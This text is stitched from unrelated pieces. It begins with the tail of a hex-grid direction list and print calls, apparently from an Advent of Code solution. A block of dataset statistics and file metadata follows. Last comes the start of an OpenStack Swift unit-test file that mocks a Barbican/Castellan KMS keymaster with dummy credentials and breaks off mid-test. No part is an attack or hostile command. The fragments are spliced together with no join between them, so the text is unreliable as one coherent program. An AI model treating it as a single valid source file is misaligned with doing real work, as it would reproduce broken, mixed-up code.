,s,s,s,se,s,se,n,sw,sw,se,se,se,ne,se,s,se,sw,n,se,se,se,s,s,se,s,se,n,s,ne,se,se,s,se,se,s,sw,s,se,se,ne,s,n,se,se,se,s,s,s,se,se,s,s,ne,se,s,se,nw,se,s,se,se,s,s,s,se,n,se,se,ne,se,se,s,sw,se,s,ne,se,se,se,s,s,se,se,se,se,se,se,se,s,ne,se,s,se,s,s,nw,nw,s,s,nw,s,se,se,ne,se,se,se,n,s,s,s,s,se,se,s,s,s,nw,sw,se,s,s,n,se,s,s,s,s,n,s,se,s,s,se,sw,nw,nw,se,se,se,s,sw,se,se,se,s,se,se,s,s,s,se,ne,s,se,s,s,se,s,ne,se,se,se,se,se,se,ne,se,ne,s,se,se,se,se,se,s,s,s,n,se,nw,nw,s,se,sw,se,se,s,se,se,nw,s,s,s,ne,nw,se,se,se,n,ne,se,s,se,ne,se,ne,sw,ne,se,s,sw,se,se,se,s,s,ne,s,se,se,sw,s,s,s,s,se,se,s,s,se,s,se,s,s,nw,s,s,s,s,nw,nw,se,s,s,sw,s,se,nw,s,se,s,se,s,se,n,sw,n,ne,s,s,s,se,se,nw,s,n,se,s,s,s,se,s,s,s,sw,se,se,se,se,se,se,sw,s,nw,se,n,s,se,sw,nw,se,se,se,se,s,ne,se,ne,s,s,se,se,se,s,s,s,s,n,se,sw,n,s,nw,s,se,s,se,se,se,s,se,n,s,se,nw,se,s,s,se,se,se,s,s,n,s,se,s,s,s,se,se,se,s,s,s,s,se,se,s,se,s,s,s,s,s,s,s,s,nw,nw,se,n,sw,s,s,ne,s,nw,s,se,s,s,sw,s,se,nw,se,s,s,s,s,s,s,s,se,se,s,se,ne,s,se,se,se,s,s,s,se,ne,s,ne,s,s,se,s,s,ne,s,s,se,s,s,s,s,s,se,n,sw,n,s,se,se,s,s,nw,s,sw,se,n,s,se,s,s,sw,s,s,s,s,s,nw,s,nw,se,se,s,s,nw,se,s,s,sw,sw,s,se,se,s,s,s,se,s,se,s,s,s,se,s,ne,s,s,se,s,s,se,se,s,s,s,n,s,s,s,s,se,s,s,se,s,s,se,s,s,s,nw,se,s,s,se,se,se,nw,s,se,ne,s,se,s,n,nw,se,sw,se,se,s,se,s,se,s,sw,s,se,se,se,nw,s,s,s,s,sw,s,s,s,n,s,sw,s,s,se,se,se,s,se,s,s,s,se,s,se,se,nw,s,s,se,ne,s,se,s,se,se,se,s,s,s,s,se,s,s,s,s,se,s,s,s,s,se,se,se,sw,s,se,s,s,nw,s,s,se,s,se,s,se,s,sw,s,ne,s,s,ne,s,sw,s,s,ne,n,s,se,se,s,s,s,s,se,se,s,s,se,se,s,nw,s,s,n,s,ne,se,n,s,s,s,s,s,sw,s,n,n,s,s,sw,s,sw,n,se,s,s,s,s,nw,se,s,s,s,s,s,s,se,s,s,sw,s,s,s,se,se,ne,s,s,s,ne,se,se,s,s,se,n,n,se,n,sw,s,sw,se,nw,n,s,n,s,nw,sw,s,se,se,s,s,s,s,s,s,se,s,s,se,s,s,s,s,s,sw,se,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,nw,se,s,se,s,s,s,s,s,s,s,s,se,nw,se,s,s,s,se,nw,s,s,ne,s,s,se,se,sw,s,ne,n,s,s,se,n,ne,se,s,s,s,s,nw,s,ne,s,s,n,s,s,s,s,s,se,s,s,s,s,se,s,s,s,s,n,s,se,s,n,s,s,sw,s,s,s,s,s,se,s,ne,s,sw,n,s,n,se,nw,nw,s,sw,ne,
n,sw,n,sw,s,n,s,se,s,se,s,s,s,s,nw,se,s,s,s,se,sw,s,se,s,s,s,s,s,s,s,s,s,s,se,ne,nw,s,s,s,s,s,se,s,ne,sw,se,se,sw,sw,s,se,ne,s,nw,ne,n,s,s,s,s,s,ne,s,s,s,s,se,s,se,s,s,s,sw,s,s,se,s,s,s,s,n,se,s,ne,s,s,s,s,se,sw,se,s,s,s,s,s,se,s,n,n,s,s,sw,s,s,s,s,ne,s,sw,s,s,s,s,s,sw,s,s,n,s,n,s,s,s,n,se,s,s,s,s,s,s,s,s,s,s,s,s,ne,sw,s,s,ne,nw,se,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,s,sw,s,s,s,nw,s,s,se,se,s,n,s,se,s,s,s,se,s,nw,s,s,s,s,se,s,s,s,ne,s,s,s,se,s,s,s,s,s,s,s,n,s,s,s,s,s,ne,s,s,s,s,sw,s,s,s,s,s,s,s,s,s,s,ne,se,sw,s,sw,s,s,s,se,s,s,s,s,se,s,s,ne,s,s,s,s,se,ne,se,n,n,n,n,n,n,nw,nw,sw,sw,nw,ne,sw,ne,sw,nw,sw,ne,s,sw,sw,sw,sw,s,sw,sw,sw,sw,nw,s,s,s,nw,s,s,s,se,s,se,s,se,n,se,s,se,s,nw,sw,se,se,s,se,se,se,se,se,se,se,se,nw,se,se,se,se,se,ne,se,ne,s,se,se,se,se,se,ne,ne,ne,ne,ne,ne,se,ne,ne,ne,ne,ne,ne,s,ne,nw,ne,sw,ne,ne,ne,ne,ne,ne,ne,se,n,ne,ne,se,ne,ne,n,se,ne,ne,sw,ne,ne,n,ne,n,ne,n,n,n,sw,n,ne,n,ne,ne,se,ne,n,n,ne,n,n,s,n,n,ne,n,s,n,n,n,s,n,ne,n,n,n,n,n,se,nw,nw,n,n,nw,n,se,n,sw,s,n,nw,nw,se,nw,nw,nw,nw,n,n,se,n,n,n,nw,nw,n,nw,ne,n,nw,n,nw,sw,nw,n,n,n,ne,se,nw,n,nw,n,n,nw,n,nw,n,nw,n,nw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,se,sw,sw,nw,se,nw,s,nw,nw,nw,nw,nw,nw,nw,s,n,nw,nw,nw,sw,nw,se,nw,nw,nw,nw,sw,sw,nw,s,sw,nw,s,nw,nw,sw,nw,sw,sw,nw,sw,se,nw,nw,nw,nw,nw,sw,sw,nw,se,sw,sw,nw,sw,nw,se,sw,nw,nw,nw,n,nw,sw,nw,ne,nw,nw,s,nw,nw,nw,sw,nw,sw,nw,sw,sw,sw,sw,n,sw,nw,s,sw,nw,ne,sw,n,s,sw,sw,sw,sw,ne,sw,sw,sw,nw,sw,s,sw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,se,n,sw,s,sw,sw,n,sw,sw,s,s,sw,sw,sw,sw,sw,sw,sw,s,s,sw,sw,sw,ne,sw,sw,s,sw,s,nw,sw,sw,se,se,sw,sw,sw,s,s,s,sw,nw,sw,nw,s,sw,sw,sw,sw,sw,sw,s,sw,s,sw,sw,sw,s,sw,s,sw,s,sw,s,sw,s,sw,s,sw,sw,s,s,s,sw,n,sw,s,n,s,s,s,sw,s,n,s,sw,sw,sw,sw,s,s,s,s,s,s,s,s,sw,sw,s,sw,se,s,s,s,sw,s,s,sw,s,ne,s,s,s,s,s,s,s,s,s,n,se,s,s,nw,s,s,s,se,s,s,s,s,s,s,s,s,s,s,nw,se,s,s,s,sw,s,s,s,s,s,s,s,ne,n,s,se,s,s,s,s,s,s,se,se,nw,nw,s,s,s,s,s,se,sw,s,s,se,s,s,s,s,s,s,s,s,s,n,s,s,s,se,s,s,s,s,s,s,se,s,s,n,s,s,se,s,s,s,se,s,s,nw,s,s,s,n,s,s,se,s,se,s,n,ne,s,s,s,s,se,ne,n,s,s
e,s,se,s,s,se,s,s,s,s,s,se,s,sw,s,se,se,s,se,s,s,ne,s,ne,ne,se,s,ne,se,s,ne,s,se,ne,se,se,se,sw,s,se,se,se,se,se,n,s,s,se,s,se,s,s,se,se,s,s,se,se,nw,se,ne,s,s,se,se,se,se,se,s,se,ne,se,se,s,ne,se,sw,se,se,se,se,se,nw,se,se,se,se,se,se,se,s,ne,n,sw,ne,se,se,se,se,se,ne,se,se,se,se,se,se,se,se,se,n,se,s,s,se,se,sw,nw,s,se,se,ne,se,se,ne,s,se,se,se,se,se,se,se,se,n,se,se,se,se,se,se,ne,se,ne,nw,se,se,ne,nw,nw,se,se,se,se,sw,se,se,sw,n,se,se,sw,se,se,se,se,nw,se,se,se,se,se,nw,sw,ne,ne,ne,se,ne,ne,nw,se,se,nw,se,se,se,se,se,ne,se,s,se,se,s,ne,se,ne,se,se,se,ne,s,se,ne,ne,ne,ne,se,n,se,se,se,se,ne,se,n,ne,se,se,se,ne,sw,nw,nw,ne,se,ne,se,se,se,n,se,ne,se,se,se,se,ne,se,ne,n,se,se,ne,nw,ne,ne,se,se,n,se,se,s,se,sw,ne,ne,ne,se,se,se,ne,ne,se,n,ne,ne,se,ne,ne,ne,se,ne,sw,n,ne,s,se,se,se,sw,ne,se,se,se,sw,ne,se,ne,ne,ne,sw,ne,ne,s,ne,s,ne,se,ne,ne,se,se,se,nw,ne,ne,ne,se,ne,se,se,ne,ne,ne,se,sw,ne,ne,ne,ne,se,ne,sw,ne,sw,ne,n,nw,sw,ne,ne,ne,sw,ne,se,sw,n,ne,ne,se,n,se,ne,n,ne,se,ne,nw,ne,ne,s,n,se,ne,nw,ne,se,ne,ne,ne,se,ne,se,se,ne,ne,ne,se,se,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,se,nw,ne,ne,ne,ne,ne,ne,ne,se,se,ne,ne,ne,se,ne,ne,ne,ne,ne,ne,ne,ne,nw,n,n,ne,nw,ne,ne,sw,se,ne,s,ne,nw,ne,nw,ne,ne,ne,ne,ne,ne,ne,n,n,ne,n,ne,ne,s,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,ne,se,n,n,ne,s,ne,ne,ne,nw,se,ne,nw,nw,ne,n,n,ne,ne,nw,ne,n,ne,sw,n,ne,ne,ne,ne,ne,ne,ne,ne,ne,n,n,ne,ne,ne,ne,ne,n,n,ne,ne,se,sw,ne,n,ne,n,ne,ne,sw,ne,ne,n,ne,ne,se,sw,ne,ne,ne,s,n,n,s,ne,n,se,ne,ne,sw,s,ne,nw,n,n,ne,nw,ne,n,n,s,s,n,ne,ne,n,n,nw,ne,n,ne,ne,ne,ne,n,s,n,se,sw,se,ne,ne,ne,n,ne,ne,ne,n,nw,ne,n,n,ne,nw,ne,ne,sw,n,n,se,ne,n,ne,nw,se,ne,ne,ne,n,ne,ne,n,ne,ne,ne,ne,n,ne,ne,s,n,s,nw,n,n,nw,ne,ne,ne,s,n,s,ne,ne,ne,n,se,ne,ne,nw,n,n,n,ne,s,sw,n,ne,n,n,sw,n,ne,n,ne,n,sw,ne,ne,ne,sw,n,ne,ne,sw,ne,ne,n,n,se,ne,ne,s,ne,ne,n,nw,s,n,n,ne,nw,sw,ne,n,ne,ne,n,ne,n,se,n,ne,sw,sw,n,n,n,ne,ne,n,ne,n,s,ne,se,ne,nw,n,n,n,n,se,nw,ne,n,n,n,n,nw,nw,ne,n,se,ne,n,n,n,ne,n,ne,ne,ne,sw,n,s,n,n,n,ne,se,n,n,ne,ne,ne,sw,ne,ne,n,n,n,n,n,n,n
e,ne,n,s,n,n,n,n,ne,ne,ne,n,n,se,nw,n,n,n,n,s,n,ne,n,n,n,n,n,n,n,n,sw,n,n,ne,n,n,n,s,ne,nw,n,nw,sw,n,n,n,n,s,n,n,ne,n,n,n,n,n,n,n,s,s,n,n,n,ne,n,s,ne,n,se,n,n,n,sw,n,n,n,ne,n,n,n,n,sw,se,n,sw,n,n,n,sw,ne,s,n,n,sw,s,se,n,n,n,n,ne,n,n,n,n,se,n,n,n,n,n,n,se,n,sw,n,n,n,nw,s,sw,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,n,sw,n,n,se,n,nw,se,n,sw,n,n,n,n,n,n,nw,n,n,n,n,n,n,n,n,n,sw,n,nw,ne,n,n,n,n,n,n,n,nw,n,n,sw,n,n,n,n,n,n,n,n,ne,n,s,n,n,n,n,ne,n,s,ne,n,n,n,nw,n,n,n,n,n,se,nw,n,nw,sw,n,n,ne,n,n,n,n,nw,n,n,n,nw,n,n,nw,n,n,n,sw,ne,n,n,s,n,n,n,nw,n,ne,n,nw,n,n,nw,nw,n,nw,nw,n,n,n,nw,sw,n,n,nw,sw,sw,n,nw,n,s,nw,n,s,nw,nw,nw,nw,n,se,n,n,nw,sw,nw,n,nw,n,ne,n,n,nw,nw,n,n,nw,nw,ne,nw,se,nw,nw,sw,n,n,n,sw,sw,n,n,n,n,nw,n,nw,nw,n,nw,n,nw,s,n,n,nw,nw,n,n,nw,n,sw,nw,nw,n,n,nw,nw,s,n,n,n,n,s,nw,n,n,n,n,n,nw,n,n,nw,n,nw,n,n,n,nw,n,n,nw,ne,nw,nw,n,nw,nw,n,n,nw,n,nw,ne,n,nw,n,n,nw,nw,nw,ne,nw,nw,n,n,n,se,ne,n,nw,n,n,n,n,nw,nw,n,nw,n,n,s,n,n,n,n,nw,n,nw,nw,se,n,nw,n,n,nw,nw,nw,nw,n,n,n,s,nw,nw,nw,ne,s,nw,nw,nw,n,nw,nw,sw,nw,n,nw,nw,n,nw,nw,n,nw,sw,n,n,n,n,nw,nw,nw,n,n,n,n,nw,n,n,ne,n,nw,nw,nw,ne,ne,n,n,nw,nw,ne,n,nw,nw,nw,nw,n,n,n,nw,nw,n,n,n,ne,nw,nw,nw,se,n,n,nw,n,nw,n,nw,nw,n,s,nw,n,nw,nw,nw,nw,nw,ne,nw,nw,n,nw,n,n,n,nw,n,n,ne,nw,n,n,nw,sw,nw,nw,nw,nw,nw,nw,nw,nw,s,nw,se,n,nw,nw,nw,nw,nw,nw,s,nw,n,nw,n,nw,nw,nw,nw,nw,se,s,nw,se,nw,n,ne,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,n,ne,nw,se,n,nw,nw,nw,nw,sw,n,nw,nw,n,nw,n,nw,nw,ne,n,nw,n,ne,se,n,sw,nw,ne,nw,sw,nw,ne,n,nw,ne,se,nw,nw,nw,nw,nw,ne,nw,n,nw,s,nw,nw,nw,ne,nw,nw,nw,nw,s,nw,n,sw,s,nw,se,nw,ne,nw,n,nw,sw,nw,n,nw,nw,sw,nw,nw,nw,nw,n,nw,nw,nw,nw,nw,nw,nw,nw,se,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,n,s,s,nw,nw,nw,se,nw,nw,nw,nw,sw,nw,nw,n,nw,n,sw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,nw,n,nw,s,nw,nw,nw,nw,nw,nw,nw,nw,n,nw,sw,nw,nw,nw,nw,nw,s,nw,sw,nw,nw,nw,se,nw,nw,sw,nw,nw,nw,nw,nw,nw,n,nw,nw,nw,n,nw,sw,n,nw,nw,se,nw,sw,se,sw,nw,sw,n,nw,nw,nw,ne,nw,nw,nw,se,nw,ne,ne,nw,nw,nw,nw,nw,s,nw,ne,n,nw,ne,nw,sw,nw,nw,sw,nw,se,nw,nw,ne,nw,ne,nw,sw,sw,nw,nw,nw,nw,nw,sw,nw
,nw,nw,se,sw,sw,nw,s,sw,nw,nw,nw,nw,ne,nw,ne,nw,nw,sw,nw,nw,nw,sw,nw,nw,nw,ne,sw,s,nw,ne,nw,nw,se,se,n,nw,nw,sw,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,n,nw,sw,nw,s,nw,sw,nw,nw,nw,sw,nw,nw,se,nw,n,nw,nw,ne,sw,nw,ne,nw,se,s,nw,nw,n,n,nw,nw,nw,nw,ne,se,sw,nw,nw,nw,nw,se,nw,nw,nw,sw,nw,nw,s,nw,nw,nw,nw,nw,sw,nw,nw,nw,nw,sw,nw,sw,nw,nw,nw,ne,nw,sw,nw,sw,nw,sw,nw,nw,nw,sw,ne,sw,nw,sw,nw,se,nw,se,nw,nw,n,sw,nw,nw,nw,nw,sw,sw,nw,sw,nw,nw,nw,nw,nw,sw,sw,nw,nw,nw,sw,nw,nw,nw,nw,ne,nw,n,nw,sw,sw,nw,nw,nw,nw,nw,sw,nw,sw,nw,sw,sw,nw,nw,sw,sw,nw,nw,nw,ne,sw,ne,sw,sw,nw,nw,nw,nw,nw,nw,nw,sw,se,nw,nw,sw,sw,nw,nw,s,nw,nw,sw,nw,nw,nw,n,sw,nw,sw,sw,n,nw,nw,nw,sw,sw,nw,s,nw,nw,nw,sw,nw,n,nw,nw,nw,nw,n,nw,nw,nw,sw,nw,nw,nw,se,nw,sw,nw,sw,sw,sw,nw,ne,s,sw,ne,nw,nw,s,nw,sw,nw,s,nw,sw,sw,sw,s,nw,se,nw,nw,nw,sw,sw,sw,n,nw,sw,nw,nw,nw,nw,nw,nw,sw,n,nw,nw,nw,s,nw,nw,nw,nw,sw,sw,sw,nw,nw,sw,sw,nw,nw,sw,nw,sw,nw,sw,sw,sw,sw,sw,nw,sw,s,nw,nw,sw,sw,sw,sw,nw,sw,sw,nw,sw,ne,nw,sw,nw,nw,sw,nw,se,nw,n,sw,nw,s,nw,ne,nw,se,sw,sw,sw,n,ne,sw,nw,sw,nw,sw,se,s,sw,sw,nw,sw,sw,nw,nw,sw,nw,sw,nw,sw,nw,sw,sw,sw,ne,sw,nw,sw,nw,nw,sw,nw,n,nw,sw,n,nw,nw,sw,sw,se,nw,nw,sw,nw,sw,sw,sw,sw,nw,se,sw,sw,nw,nw,sw,sw,sw,nw,sw,nw,nw,nw,sw,n,nw,sw,n,nw,s,nw,nw,sw,s,sw,sw,nw,sw,sw,sw,nw,ne,sw,ne,sw,s,sw,sw,nw,sw,nw,sw,sw,nw,nw,nw,sw,sw,ne,sw,n,sw,sw,sw,n,sw,sw,nw,sw,n,n,sw,sw,sw,nw,s,sw,sw,sw,sw,nw,nw,sw,nw,sw,sw,s,sw,nw,sw,sw,sw,s,sw,sw,n,nw,sw,n,sw,sw,s,nw,se,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,nw,sw,sw,sw,s,ne,se,nw,sw,sw,sw,nw,s,nw,nw,sw,sw,s,sw,sw,se,sw,sw,sw,sw,sw,sw,sw,sw,sw,nw,sw,nw,nw,nw,nw,nw,nw,s,nw,sw,sw,sw,sw,sw,n,sw,se,sw,sw,s,sw,sw,sw,sw,sw,s,s,sw,s,ne,sw,sw,s,sw,sw,nw,sw,sw,sw,sw,ne,se,sw,sw,sw,sw,n,sw,sw,sw,sw,s,nw,se,nw,nw,sw,sw,nw,se,nw,se,sw,sw,sw,nw,s,sw,sw,sw,sw,sw,sw,sw,sw,sw,ne,se,nw,nw,sw,sw,sw,n,s,sw,nw,nw,se,sw,ne,sw,n,s,sw,sw,nw,sw,sw,sw,sw,sw,ne,sw,sw,se,sw,sw,sw,sw,nw,sw,sw,ne,sw,nw,sw,s,sw,sw,sw,sw,sw,sw,sw,sw,se,sw,se,sw,sw,sw,sw,sw,nw,sw,sw,sw,sw,sw,se,sw,sw,se,sw,sw,ne"
""
print(solution_part_one(puzzle_input))
print(solution_part_two(puzzle_input))
| 276.943182
| 22,006
| 0.620697
| 8,502
| 24,371
| 1.770525
| 0.008469
| 0.191058
| 0.155451
| 0.117452
| 0.948449
| 0.867668
| 0.751146
| 0.577227
| 0.399787
| 0.267455
| 0
| 0.000804
| 0.030487
| 24,371
| 87
| 22,007
| 280.126437
| 0.636279
| 0.000657
| 0
| 0.397059
| 0
| 0.014706
| 0.903643
| 0.902822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.044118
| 0.029412
| 0.235294
| 0.029412
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a2c2206e4ff99f56682cceff966785df48ff2137
| 32,978
|
py
|
Python
|
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
test/unit/common/middleware/crypto/test_kms_keymaster.py
|
hashsos/hashcloudos-swift
|
25db6f317de58a9da226f97f0e2eedac658a0042
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import mock
import unittest

import sys
# Stub out castellan *before* importing kms_keymaster below: the module
# under test imports castellan at import time, and these tests never need
# the real package installed.
sys.modules['castellan'] = mock.Mock()
sys.modules['castellan.common'] = mock.Mock()
sys.modules['castellan.common.credentials'] = mock.Mock()

from keystoneauth1.exceptions.connection import ConnectFailure
from keystoneauth1.exceptions.http import Unauthorized
from keystoneclient.exceptions import DiscoveryFailure

from swift.common.middleware.crypto import kms_keymaster
from swift.common.swob import Request

from test.unit.common.middleware.helpers import FakeSwift, FakeAppThatExcepts
TEST_KMS_INVALID_KEY_ID = 'invalid-kms-key-id'
TEST_KMS_NONEXISTENT_KEY_ID = '11111111-1111-1111-1111-ffffffffffff'
TEST_KMS_OPAQUE_KEY_ID = '22222222-2222-2222-2222-aaaaaaaaaaaa'
TEST_KMS_SHORT_KEY_ID = '22222222-2222-2222-2222-bbbbbbbbbbbb'
TEST_KMS_DES_KEY_ID = '22222222-2222-2222-2222-cccccccccccc'
TEST_KMS_NONE_KEY_ID = '22222222-2222-2222-2222-dddddddddddd'
TEST_KMS_INVALID_API_VERSION = 'vBadVersion'
TEST_KMS_INVALID_USER_DOMAIN_NAME = "baduserdomainname"
TEST_KMS_CONNECT_FAILURE_URL = 'http://endpoint_url_connect_error:45621'
TEST_KMS_NON_BARBICAN_URL = 'http://endpoint_url_nonbarbican:45621'
TEST_PROXYSERVER_CONF_EXTERNAL_KEYMASTER_CONF = {
'keymaster_config_path': 'PATH_TO_KEYMASTER_CONFIG_FILE',
}
TEST_KMS_KEYMASTER_CONF = {
'auth_endpoint': 'kmsauthurlv3',
'password': 'kmspass',
'username': 'kmsuser',
'user_domain_id': None,
'user_domain_name': 'default',
'project_id': None,
'project_name': 'kmsproject',
'project_domain_id': None,
'project_domain_name': 'default',
'key_id': 'valid_kms_key_id-abcdefg-123456'
}
def capture_start_response():
calls = []
def start_response(*args):
calls.append(args)
return start_response, calls
def mock_castellan_api_side_effect(*args, **kwargs):
return MockBarbicanKeyManager(args[0])
def mock_options_set_defaults_side_effect(*args, **kwargs):
'''
Add options from kwargs into args dict.
'''
args[0].update(kwargs)
def mock_config_opts_side_effect(*args, **kwargs):
return dict()
def mock_keystone_password_side_effect(username, password, project_name,
user_domain_name, project_domain_name,
user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id,
project_domain_id, reauthenticate):
return MockPassword(username, password, project_name, user_domain_name,
project_domain_name, user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id, project_domain_id,
reauthenticate)
ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED = 'Secret incorrectly specified.'
ERR_MESSAGE_KEY_UUID_NOT_FOUND = 'Key not found, uuid: '
class MockBarbicanKeyManager(object):
def __init__(self, conf):
self.conf = conf
def get(self, ctxt, key_id):
# If authentication fails, raise an exception here.
if (TEST_KMS_KEYMASTER_CONF['username'] !=
ctxt.username
or TEST_KMS_KEYMASTER_CONF['password'] !=
ctxt.password or
TEST_KMS_KEYMASTER_CONF['user_domain_name'] !=
ctxt.user_domain_name):
raise Unauthorized(
message='The request you have made requires authentication.',
http_status=401)
elif self.conf['auth_endpoint'] == TEST_KMS_CONNECT_FAILURE_URL:
raise ConnectFailure('Unable to establish connection')
elif self.conf['auth_endpoint'] == TEST_KMS_NON_BARBICAN_URL:
raise DiscoveryFailure(
'Could not determine a suitable URL for the plugin')
elif (self.conf['auth_endpoint'] !=
TEST_KMS_KEYMASTER_CONF['auth_endpoint']):
raise Unauthorized(
message='Cannot authorize API client.')
elif (key_id == TEST_KMS_NONEXISTENT_KEY_ID):
message = ERR_MESSAGE_KEY_UUID_NOT_FOUND + key_id
'''
Raising a ManagedObjectNotFoundError would require importing it
from castellan.common.exception. To avoid this import, raising a
general Exception.
'''
raise Exception(message)
elif key_id == TEST_KMS_INVALID_KEY_ID:
raise ValueError(ERR_MESSAGE_SECRET_INCORRECTLY_SPECIFIED)
elif key_id == TEST_KMS_NONE_KEY_ID:
return None
return MockBarbicanKey(b'x' * 32, key_id)
class MockBarbicanKey(object):
def __init__(self, key_material, key_id):
self.key_material = key_material
self.bit_length = len(key_material) * 8
if key_id == TEST_KMS_OPAQUE_KEY_ID:
self.format = 'Opaque'
else:
self.format = 'RAW'
self.algorithm = "aes"
if key_id == TEST_KMS_DES_KEY_ID:
self.format = 'des'
if key_id == TEST_KMS_SHORT_KEY_ID:
self.bit_length = 128
self.key_material[:128]
def get_encoded(self):
return self.key_material
def format(self):
return self.format
class MockPassword(object):
def __init__(self, username, password, project_name, user_domain_name,
project_domain_name, user_id, user_domain_id, trust_id,
domain_id, domain_name, project_id, project_domain_id,
reauthenticate):
self.password = password
self.username = username
self.user_domain_name = user_domain_name
self.project_name = project_name
self.project_domain_name = project_domain_name
self.user_id = user_id,
self.user_domain_id = user_domain_id,
self.trust_id = trust_id,
self.domain_id = domain_id,
self.domain_name = domain_name,
self.project_id = project_id,
self.project_domain_id = project_domain_id,
self.reauthenticate = reauthenticate
class TestKmsKeymaster(unittest.TestCase):
"""
Unit tests for storing the encryption root secret in a Barbican external
key management system accessed using Castellan.
"""
def setUp(self):
super(TestKmsKeymaster, self).setUp()
self.swift = FakeSwift()
"""
Tests using the v3 Identity API, where all calls to Barbican are mocked.
"""
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster,
'_get_root_secret')
def test_filter_v3(self, mock_get_root_secret_from_kms,
mock_readconf):
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
factory = kms_keymaster.filter_factory(TEST_KMS_KEYMASTER_CONF)
self.assertTrue(callable(factory))
self.assertTrue(callable(factory(self.swift)))
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster,
'_get_root_secret')
def test_app_exception_v3(self, mock_get_root_secret_from_kms,
mock_readconf):
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
app = kms_keymaster.KmsKeyMaster(
FakeAppThatExcepts(), TEST_KMS_KEYMASTER_CONF)
req = Request.blank('/', environ={'REQUEST_METHOD': 'PUT'})
start_response, _ = capture_start_response()
self.assertRaises(Exception, app, req.environ, start_response)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch.object(kms_keymaster.KmsKeyMaster, '_get_root_secret')
def test_get_root_secret(
self, mock_get_root_secret_from_kms, mock_readconf):
# Successful call with coarse _get_root_secret_from_kms() mock.
mock_get_root_secret_from_kms.return_value = (
base64.b64encode(b'x' * 32))
'''
Return valid Barbican configuration parameters.
'''
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
'''
Verify that keys are derived correctly by the keymaster.
'''
self.app = kms_keymaster.KmsKeyMaster(self.swift,
TEST_KMS_KEYMASTER_CONF)
'''
Verify that _get_root_secret_from_kms() was called with the
correct parameters.
'''
mock_get_root_secret_from_kms.assert_called_with(
TEST_KMS_KEYMASTER_CONF
)
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config, mock_keystone_password):
# Successful call with finer grained mocks.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
mock_oslo_config.ConfigOpts.side_effect = (
mock_config_opts_side_effect)
'''
Return valid Barbican configuration parameters.
'''
mock_readconf.return_value = TEST_KMS_KEYMASTER_CONF
'''
Verify that no exceptions are raised by the mocked functions.
'''
try:
self.app = kms_keymaster.KmsKeyMaster(self.swift,
TEST_KMS_KEYMASTER_CONF)
except Exception:
print("Unexpected error: %s" % sys.exc_info()[0])
raise
@mock.patch('swift.common.middleware.crypto.kms_keymaster.'
'keystone_password.KeystonePassword')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.cfg')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.options')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.readconf')
@mock.patch('swift.common.middleware.crypto.kms_keymaster.key_manager')
def test_mocked_castellan_keymanager_invalid_key_id(
self, mock_castellan_key_manager, mock_readconf,
mock_castellan_options, mock_oslo_config,
mock_keystone_password):
# Invalid key ID.
mock_keystone_password.side_effect = (
mock_keystone_password_side_effect)
'''
Set side_effect functions.
'''
mock_castellan_key_manager.API.side_effect = (
mock_castellan_api_side_effect)
mock_castellan_options.set_defaults.side_effect = (
mock_options_set_defaults_side_effect)
